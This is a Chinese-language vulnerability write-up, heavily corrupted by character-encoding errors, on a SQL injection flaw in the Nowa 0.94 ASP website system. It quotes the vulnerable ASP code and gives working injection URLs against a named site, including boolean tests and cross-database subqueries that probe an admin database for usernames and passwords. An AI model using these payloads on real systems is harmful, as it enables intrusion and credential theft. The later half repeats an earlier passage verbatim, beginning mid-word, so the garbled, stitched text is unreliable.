­º¥ý声©ú¡A这个º|¬}¤£¬O§Ú发现ªº¡A§Ú¥u¬O§@¤F¤@¦¸ªº¤ÀªR¡A¤£¨¬¤§处请¤£§[«ü±Ð¡C

这个¯¸点¦b当ªì³Q认为¬O¤ñ较¦w¥þªº¥þ¯¸¨t统¡A¨Æ实¤W现¦b¤]¬O¡C¡]¦Z来ªº补¤B¨½¥X现¤F¤W传º|¬}¡A¤£¦b讨论¤§¦C¡C¡^¦]¦¹这个¨t统³Q§ï编为«Ü¦hª©¥»¡G
Nowa 0.94ª©¥»¡]­ìª©¡^
§Î¶H¤¤国¾ã¯¸¡]­×§ïª©¥»¡^
蓝«B¾ã¯¸¡]­×§ïª©¥»¡^
¸¨¤é¾ã¯¸¡]­×§ïª©¥»¡^
¬y¬P¾ã¯¸¡]­×§ïª©¥»¡^---------------------------------------------¡]·P谢hak_ban´£¨Ñ¡^
§Úªº¯¸http://www.918x.com´N¬O这个¨t统ªº¡A还¦³«Ü¦hªº¯¸点¥Î¨ì这个¨t统¡]¥]¬A¤p¸ôªº666w.com¡A¼K¼K¡^¡C
§Ú们¥ý来¬Ýº|¬}¤å¥óªº­ì¥N码¡G <%sub article_body()
dim totalart,Currentpage,totalpages,i,j,colname
openarticle
sql="select art_id,cat_id,art_title,art_date,art_count from art order by art_date DESC"
if request("cat_id")<>"" then
sql="select art_id,cat_id,art_title,art_date,art_count from art where cat_id="&request("cat_id")&" order by art_date DESC"
elseif request("keyword")<>"" then
sql="select art_id,cat_id,art_title,art_date,art_count from art where "&request("select")&" like %"&request("keyword")&"%order by art_date DESC"
elseif request("cat_id")<>"" and request("keyword")<>"" then
sql="select art_id,cat_id,art_title,art_date,art_count from art where art_title or art_content like %"&request("keyword")&"%order by art_date DESC"
end if
set rs=server.createobject("adodb.recordset")
rs.open sql,conn,1,1
%>

关键这¥y¡G sql="select art_id,cat_id,art_title,art_date,art_count from art where "&request("select")&" like %"&request("keyword")&"%order by art_date DESC"

§Ú们从¥t¤@个¤å¥óFORMAT.asp¨½发现¤å¥ó对requestªºkeyword变¶q进¦æ¤F过滤¡A却没¦³对requestªºselect进¦æ¦³®Ä检¬d¡C
©Ò¥H当§Ú们´£¥æ¡]%20¬OªÅ®æ¡^
http://www.918x.com/article.asp?select=art_title&keyword=1%20and%201=1
¬O¤£¦¨¥\ªº¡A¦ý¬O´£¥æ¡G http://www.918x.com/article.asp? keyword=1&select=art_title%20and%201=1

http://www.918x.com/article.asp? keyword=1&select=art_title%20and%201=2
´N¯à¦¨¥\ªº达¨ìª`¤Jªº¥Øªº¡C
¾ã个¤å³¹¨t统¦³两处·j¯Á¡A°£¤Farticle.asp还¦³download.asp¡A¤_¬O¬Ý¤F¬Ý¥N码¡A却没¦³发现&request("select")¡A¦Ó¬Oª½±µ§âsoft_nameµ¥©ñ¦b¬d询¤¤¡A¬Ý°_来¦n¶H这两个¬d询¤£¬O¦P¤@个¤H写ªº¡C

¦A来说说§Q¥Î¡C§Ú们ª¾¹D¡A这个¾ã¯¸¦³5个数Õu库¡A±K码«O¦s¦badmin.mdb¨½¡]Àq认±¡况¤U¡^¡C
¦Ó¤W­zª`¤J¥u¬O©º对article.mdbªº¡C§Ú们³Ì¦h¯à够¼É¥Xarticle.mdbªí¨½ªº数Õu¡C
¨º¯à¤£¯à¸ó库¬d询©O¡H
­º¥ý§Ú¥²须ª¾¹D«O¦sadminªº数Õu库ªº¦W¦r¡A°²设为admin.asp¡A§Ú们还»Ý­nª¾¹D数Õu库ªºª«²z¸ô径¡A°²设为d:\web\data\ µM¦Z¦p¤U¬d询¡G
http://www.918x.com/article.asp? keyword=1&select=art_title%20and %200<>(select%20count(*)%20from%20d:\web\data\admin.asp.admin%20where%20admin_name)

http://www.918x.com/article.asp? keyword=1&select=art_title%20and %200<>(select%20count(*)%20from%20d:\web\data\admin.asp.admin%20where%20admin_password)
ªð¦^¦¨¥\¡A则说©ú¦³adminªí©Madmin_name,admin_password¦C¡C
±µ¤U来«K¥i¥Hª`¤J¡A¼É¥X¥Î户¦W©M±K码来¡C§Ú´N¤£¦h说¤F¡A¤j®a³£会ªº¡C
这Ïú±¡况Óì¥Î¤_
1¡Dª¾¹D数Õu库ªºª«²z¸ô径
2¡D数Õu库¤£¦b¥i访问ªºweb¥Ø录¨½¡A¦b¤W级¥Ø录¡A©ÎªÌ¨ä¥L¦a¤è¡A©ÎªÌ数Õu库§@¤F¨¾¤U载处²z¡]§_则§Ú们¥i¥Hª½±µ¤U载admin数Õu库¡A¤S¦ó¥²ª`¤J¨º¤\³Â烦©O¡C¡^

总ªº来说§Q¥ÎªºÉ²­È¤£¤j¡A¦ó况20040415ªº补¤B¨Ï±o±K码还¬Omd5¥[±Kªº¡C
rt_date,art_count from art where cat_id="&request("cat_id")&" order by art_date DESC"
elseif request("keyword")<>"" then
sql="select art_id,cat_id,art_title,art_date,art_count from art where "&request("select")&" like %"&request("keyword")&"%order by art_date DESC"
elseif request("cat_id")<>"" and request("keyword")<>"" then
sql="select art_id,cat_id,art_title,art_date,art_count from art where art_title or art_content like %"&request("keyword")&"%order by art_date DESC"
end if
set rs=server.createobject("adodb.recordset")
rs.open sql,conn,1,1
%>[/code]
关键这¥y¡G sql="select art_id,cat_id,art_title,art_date,art_count from art where "&request("select")&" like %"&request("keyword")&"%order by art_date DESC"

§Ú们从¥t¤@个¤å¥óFORMAT.asp¨½发现¤å¥ó对requestªºkeyword变¶q进¦æ¤F过滤¡A却没¦³对requestªºselect进¦æ¦³®Ä检¬d¡C
©Ò¥H当§Ú们´£¥æ¡]%20¬OªÅ®æ¡^
http://www.918x.com/article.asp?select=art_title&keyword=1%20and%201=1
¬O¤£¦¨¥\ªº¡A¦ý¬O´£¥æ¡G http://www.918x.com/article.asp? keyword=1&select=art_title%20and%201=1

http://www.918x.com/article.asp? keyword=1&select=art_title%20and%201=2
´N¯à¦¨¥\ªº达¨ìª`¤Jªº¥Øªº¡C
¾ã个¤å³¹¨t统¦³两处·j¯Á¡A°£¤Farticle.asp还¦³download.asp¡A¤_¬O¬Ý¤F¬Ý¥N码¡A却没¦³发现&request("select")¡A¦Ó¬Oª½±µ§âsoft_nameµ¥©ñ¦b¬d询¤¤¡A¬Ý°_来¦n¶H这两个¬d询¤£¬O¦P¤@个¤H写ªº¡C

¦A来说说§Q¥Î¡C§Ú们ª¾¹D¡A这个¾ã¯¸¦³5个数Õu库¡A±K码«O¦s¦badmin.mdb¨½¡]Àq认±¡况¤U¡^¡C
¦Ó¤W­zª`¤J¥u¬O©º对article.mdbªº¡C§Ú们³Ì¦h¯à够¼É¥Xarticle.mdbªí¨½ªº